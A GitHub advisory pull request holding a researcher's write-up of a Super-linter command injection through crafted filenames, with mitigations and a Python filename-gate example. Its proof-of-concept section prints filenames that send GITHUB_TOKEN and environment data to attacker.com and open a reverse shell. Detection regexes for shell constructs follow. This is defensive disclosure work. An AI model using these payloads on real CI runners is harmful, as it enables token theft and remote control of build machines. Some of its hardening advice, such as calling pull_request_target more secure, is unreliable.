
[GHSA-r79c-pqj3-577x] Super-linter is vulnerable to command injection via crafted filenames in Super-linter Action#6910

Open

asrar-mared wants to merge 1 commit into asrar-mared/advisory-improvement-6910 from asrar-mared-GHSA-r79c-pqj3-577x

Conversation

@asrar-mared

GitHub Super-linter Command Injection Vulnerability Analysis

CVE-2026-25761 - Professional Security Assessment


Executive Summary

Vulnerability Identifier: CVE-2026-25761
Severity Rating: HIGH
Affected Component: Super-linter/super-linter GitHub Action
Discovery Date: Last Week
Status: PATCHED

Discovered By:
Security Researcher: Asrar Mared (The Warrior Bug Hunter)
Contact: nike49424@proton.me
GitHub: @asrar-mared


Vulnerability Overview

The Super-linter GitHub Action contains a critical command injection vulnerability that allows malicious actors to execute arbitrary commands through specially crafted filenames. This vulnerability represents a significant security risk to organizations utilizing Super-linter in their CI/CD pipelines.

Technical Classification

  • Attack Vector: Network (via Pull Request)
  • Attack Complexity: Low
  • Privileges Required: None (for public repositories)
  • User Interaction: Required (workflow trigger)
  • Scope: Changed
  • Impact Type: Command Injection / Code Execution

Affected Versions & Remediation

Vulnerable Versions

| Component                      | Affected Range    | Status     |
|--------------------------------|-------------------|------------|
| super-linter/super-linter      | >= 6.0.0, < 8.3.1 | VULNERABLE |
| super-linter/super-linter/slim | >= 6.0.0, < 8.3.1 | VULNERABLE |

Patched Versions

| Component                      | Secure Version | Release Date |
|--------------------------------|----------------|--------------|
| super-linter/super-linter      | 8.3.1          | Last Week    |
| super-linter/super-linter/slim | 8.3.1          | Last Week    |

Technical Deep Dive

Attack Mechanism

The vulnerability exploits insufficient input validation in Super-linter's file discovery mechanism. The workflow processes filenames without proper sanitization, allowing shell command substitution syntax to be executed.

Exploitation Flow

1. Attacker submits Pull Request
   ↓
2. PR contains file with malicious name: $(curl http://attacker.com?token=$GITHUB_TOKEN)
   ↓
3. Super-linter workflow triggers on pull_request event
   ↓
4. File discovery script processes filename
   ↓
5. Shell interprets $(...) as command substitution
   ↓
6. Malicious command executes in workflow context
   ↓
7. Attacker gains access to GITHUB_TOKEN and workflow secrets

Proof of Concept (Educational Purpose)

Malicious Filename Example:

# Filename that exfiltrates GitHub token
"$(curl -X POST https://attacker.com/collect -d token=$GITHUB_TOKEN).txt"

# Filename that executes reverse shell
"$(bash -i >& /dev/tcp/attacker.com/4444 0>&1).md"

# Filename that enumerates environment
"$(env | curl -X POST https://attacker.com/dump --data-binary @-).py"

Root Cause Analysis

The vulnerability stems from the file scanning logic within Super-linter that processes repository files. The scripts use unquoted variable expansion and command substitution patterns without proper escaping:

Vulnerable Code Pattern (Conceptual):

# Vulnerable approach
FILES=$(find . -name "$PATTERN")
for file in $FILES; do
    # Command injection occurs here
    process_file $file
done

Secure Alternative:

# Secure approach
find . -name "$PATTERN" -print0 | while IFS= read -r -d '' file; do
    # Properly quoted and escaped
    process_file "$file"
done

Impact Assessment

Security Implications

1. Arbitrary Code Execution

  • Impact Level: CRITICAL
  • Attackers can execute any command within the runner environment
  • Full access to workflow execution context
  • Potential for lateral movement within CI/CD infrastructure

2. Credential Exposure

  • Impact Level: HIGH
  • Access to GITHUB_TOKEN with repository permissions
  • Exposure of environment variables and secrets
  • Potential compromise of deployment credentials

3. Supply Chain Attack Vector

  • Impact Level: HIGH
  • Compromised workflows can inject malicious code
  • Potential for persistent backdoors in CI/CD pipeline
  • Risk of downstream software supply chain compromise

Exploitation Prerequisites

For successful exploitation, the following conditions must be met:

| Requirement       | Description                                     | Likelihood  |
|-------------------|-------------------------------------------------|-------------|
| Workflow Trigger  | Super-linter configured for pull_request events | HIGH        |
| Repository Access | Ability to create Pull Requests                 | MEDIUM-HIGH |
| Approval Bypass   | Workflow runs without admin approval            | VARIABLE    |
| Token Permissions | GITHUB_TOKEN with write/delete access           | MEDIUM      |

Attack Scenarios

Scenario 1: Public Repository Attack

Attacker: External contributor
Target: Open-source project using Super-linter
Attack Vector: Malicious PR with crafted filename
Impact: Token exfiltration, code injection

Scenario 2: Fork-Based Attack

Attacker: Repository fork owner
Target: Parent repository with Super-linter
Attack Vector: PR from forked repo
Impact: Limited (read-only token in fork context)

Scenario 3: Internal Threat

Attacker: Repository collaborator
Target: Private repository
Attack Vector: Direct PR with malicious file
Impact: Full compromise potential

Detection & Indicators of Compromise

Detection Methods

1. Workflow Log Analysis

Look for suspicious patterns in GitHub Actions logs:

- Unusual network connections during Super-linter execution
- Unexpected command executions in file processing steps
- Error messages indicating shell interpretation of filenames
- Outbound connections to external domains

2. File Naming Patterns

Monitor for suspicious filename patterns in Pull Requests:

# Regex patterns for detection
.*\$\(.*\).*          # Command substitution
.*`.*`.*              # Backtick substitution
.*;\s*.*              # Command chaining
.*\|\s*.*             # Pipe operations
.*&&\s*.*             # Logical AND chaining

3. Behavioral Indicators

- Pull Requests with unusual file naming conventions
- Workflow failures in file discovery steps
- Unexpected outbound network traffic during linting
- Anomalous environment variable access patterns

Mitigation Strategies

Immediate Actions (Emergency Response)

1. Update Super-linter (CRITICAL - Priority 1)

# Update workflow configuration
- name: Lint Code Base
  uses: super-linter/super-linter@v8.3.1  # Updated version
  env:
    GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

2. Implement Workflow Restrictions (HIGH - Priority 2)

# Require approval for external contributors
on:
  pull_request_target:  # More secure for external PRs
    
permissions:
  contents: read        # Minimal necessary permissions
  pull-requests: read

3. Token Permission Hardening (HIGH - Priority 3)

permissions:
  contents: read
  # Deny write access unless explicitly needed
  actions: none
  checks: none
  deployments: none

Long-Term Security Improvements

1. Input Validation Layer

- name: Validate PR Files
  run: |
    # Reject PRs with suspicious filenames
    if git diff --name-only HEAD^ | grep -E '\$\(|\`|;|\||&&'; then
      echo "Suspicious filename detected"
      exit 1
    fi

2. Sandboxed Execution Environment

# Docker-create flags belong on a container job; a docker:// step's `with:` only accepts args/entrypoint
lint:
  runs-on: ubuntu-latest
  container:
    image: ghcr.io/super-linter/super-linter:v8.3.1
    options: --security-opt no-new-privileges --read-only
  steps:
    - uses: actions/checkout@v4
    # invoke the linter in a step here; a container job does not run the image entrypoint by itself

3. Monitoring & Alerting

- name: Security Monitoring
  if: failure()
  uses: actions/github-script@v7   # requires `issues: write` in the job's permissions
  with:
    script: |
      // Alert security team on suspicious activity
      await github.rest.issues.create({
        ...context.repo,   // owner and repo are mandatory parameters of issues.create
        title: 'Potential Super-linter Exploit Attempt',
        body: 'Suspicious workflow failure detected'
      });

Recommendations

For Repository Administrators

IMMEDIATE (0-24 hours):

  1. ✅ Update all Super-linter workflows to version 8.3.1
  2. ✅ Audit recent Pull Requests for suspicious filenames
  3. ✅ Review workflow logs for exploitation indicators
  4. ✅ Rotate potentially compromised tokens

SHORT-TERM (1-7 days):

  1. 🔒 Implement workflow approval requirements for external contributors
  2. 🔒 Apply principle of least privilege to GITHUB_TOKEN permissions
  3. 🔒 Enable branch protection rules
  4. 🔒 Configure security scanning and secret detection

LONG-TERM (Ongoing):

  1. 📊 Establish continuous monitoring for workflow anomalies
  2. 📊 Conduct regular security audits of CI/CD configurations
  3. 📊 Train development team on secure workflow practices
  4. 📊 Implement defense-in-depth strategies

For Security Teams

  1. Threat Intelligence:
    • Monitor for active exploitation attempts
    • Track related CVEs and attack patterns
    • Share IOCs with security community
  2. Incident Response:
    • Develop playbooks for CI/CD compromises
    • Practice incident response scenarios
    • Establish communication protocols
  3. Security Architecture:
    • Review all GitHub Actions for similar vulnerabilities
    • Implement workflow security baselines
    • Deploy automated security testing

Additional Context & References

Related Security Advisories

Official Resources

Workflow Security Considerations

High-Risk Workflow Triggers:

  • pull_request_target: Has write access to base repository
  • workflow_call: Inherits caller's permissions
  • pull_request: Can be exploited without this CVE

Recommended Configuration:

# Secure workflow template
name: Secure Linting
on:
  pull_request:
    types: [opened, synchronize, reopened]

permissions:
  contents: read
  pull-requests: read

jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: super-linter/super-linter@v8.3.1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

Conclusion

CVE-2026-25761 represents a significant security vulnerability in a widely-used GitHub Action. The command injection flaw demonstrates the critical importance of input validation in CI/CD security. Organizations must prioritize updating to Super-linter v8.3.1 and implementing comprehensive workflow security controls.

The discovery and responsible disclosure of this vulnerability highlights the essential role of security researchers in protecting the software supply chain. Continuous vigilance and proactive security measures remain paramount in maintaining secure development pipelines.


Report Compiled By:
Asrar Mared - The Warrior Bug Hunter
Security Researcher & Vulnerability Analyst
Contact: nike49424@proton.me
GitHub: @asrar-mared

Report Date: February 2026
Classification: Public
Version: 1.0


This report is provided for educational and defensive security purposes. Unauthorized exploitation of vulnerabilities is illegal and unethical.
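As an added example (not Super-linter's code and not part of the report above), the pre-lint filename gate from the "File Naming Patterns" and "Input Validation Layer" sections, applied to a constructed list of PR paths, together with a helper that builds the linter command as an argv list so the shell never parses a filename. The extra "newline" pattern and the `--` separator go beyond the report's list; they are this example's additions.

```python
import re
from typing import Dict, List

# Patterns from the report's "File Naming Patterns" section, one per shell
# construct so a rejection message can name what was found.
SUSPICIOUS_PATTERNS: Dict[str, re.Pattern] = {
    "command substitution": re.compile(r"\$\("),
    "backtick substitution": re.compile(r"`"),
    "command chaining": re.compile(r";"),
    "pipe": re.compile(r"\|"),
    "logical AND": re.compile(r"&&"),
    # Beyond the report's list: a newline in a name breaks line-oriented
    # tools such as `git diff --name-only` and unquoted for-loops.
    "newline": re.compile(r"\n"),
}


def suspicious_names(changed_files: List[str]) -> Dict[str, List[str]]:
    """Map each offending path to the shell constructs found in it."""
    findings: Dict[str, List[str]] = {}
    for path in changed_files:
        hits = [label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(path)]
        if hits:
            findings[path] = hits
    return findings


def lint_argv(linter: str, path: str) -> List[str]:
    """Build the linter command as an argv list for subprocess.run(..., shell=False).
    With no shell involved, "$(...)" inside `path` is just bytes in one argument;
    "--" keeps a name beginning with "-" from being read as an option."""
    return [linter, "--", path]


# Constructed sample: paths a PR gate might read from `git diff --name-only -z`.
SAMPLE_CHANGED_FILES = [
    "src/app.py",
    "docs/README.md",
    "$(id).txt",
    "notes`id`.md",
    "-rf.yaml",
]

if __name__ == "__main__":
    bad = suspicious_names(SAMPLE_CHANGED_FILES)
    for path, hits in bad.items():
        print(f"reject {path!r}: {', '.join(hits)}")
    raise SystemExit(1 if bad else 0)
```

Run as a workflow step, a non-zero exit fails the job before any linter touches the crafted name; `-rf.yaml` is not flagged, which is why the `--` separator in `lint_argv` is still needed.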

@github (Collaborator) commented Feb 16, 2026

Hi there @ferrarimarco! A community member has suggested an improvement to your security advisory. If approved, this change will affect the global advisory listed at github.com/advisories. It will not affect the version listed in your project repository.

This change will be reviewed by our Security Curation Team. If you have thoughts or feedback, please share them in a comment here! If this PR has already been closed, you can start a new community contribution for this advisory

@github-actions github-actions bot changed the base branch from main to asrar-mared/advisory-improvement-6910 February 16, 2026 01:42
@asrar-mared (Author)

A file containing the complete analysis and solution to the vulnerability has been added to the Zayed Shield repository. You can refer to it directly if you need technical details or remediation steps. My goal is to share knowledge and support the security community. I wish I could offer more, but these are my current capabilities. Nevertheless, I am working hard to demonstrate a level of professionalism that we all deserve.

The full analysis and solution to the vulnerability have been added to the Zayed Shield repository.
